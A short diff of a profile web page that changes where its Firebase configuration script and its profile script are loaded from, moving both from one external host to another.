--- a/Akun/profile.html
+++ b/Akun/profile.html
@@ -11,7 +11,7 @@
   <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-storage.js"></script>
 
   <!-- Firebase configuration -->
-<script src="https://kosred.com/a/klttyp.js"></script> 
+<script src="https://linkilesensitive.000webhostapp.com/Backend/config6.js"></script> 
   <!-- Firebase configuration -->
     
 
@@ -338,7 +338,7 @@
 
 
   <!-- Your profile.js script -->
-  <script src="https://kosred.com/a/iorhc.js">
+  <script src="https://linkilesensitive.000webhostapp.com/Backend/profil.js">
       
   </script>
 </body>
